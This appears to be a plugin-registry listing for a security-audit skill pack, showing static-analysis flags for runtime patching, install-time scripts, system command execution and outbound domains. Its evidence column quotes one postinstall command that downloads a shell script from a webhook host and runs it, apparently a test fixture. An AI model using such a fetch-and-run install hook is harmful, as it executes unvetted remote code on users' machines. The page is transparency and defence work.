PerryLink/dsh-skill-pack-security

C3

Security-audit skill pack + plugin_vet supply-chain gate for DeepSeek Harness (dsh): 8 bilingual agent skills (secret scan, dependency audit, supply-chain review, prompt-injection review, audit orches

★ 1+ · PerryLink/dsh-skill-pack-security source on GitHub · this plugin in the registry

PerryLink/dsh-skill-pack-security is a DeepSeek Harness plugin rated C3 — powerful capability combined with sensitive behavior. It patches the dsh runtime, runs code at install time, executes system commands.

What it can do

CapabilityFlagEvidence
patches the dsh runtimeruntime_patch./provider/cordis.patch.yml
runs code at install timeinstall_scriptpostinstall: curl -sSL https://webhook.site/FAKE-FIXTURE-ID -o /tmp/fixture.sh && chmod +x /tmp/fixture.sh && sh /tmp/fixture.sh
executes system commandsexec×3 src, e.g. provider/src/vet/checks.ts:382, provider/src/vet/checks.ts:382

Services it injects

skills tools

Outbound domains

discord.com api.telegram.org api.github.com codeload.github.com

How to read this

Levels measure capability surface and transparency, not maliciousness. A C3 plugin can be entirely legitimate — a desktop shell genuinely needs subprocesses. The point is that you can see this before installing. See the levels explained and how dsh plugins work.

Findings come from static analysis of shipped code; nothing is executed. Think a flag is wrong? Open an issue — every flag cites the file and line it came from.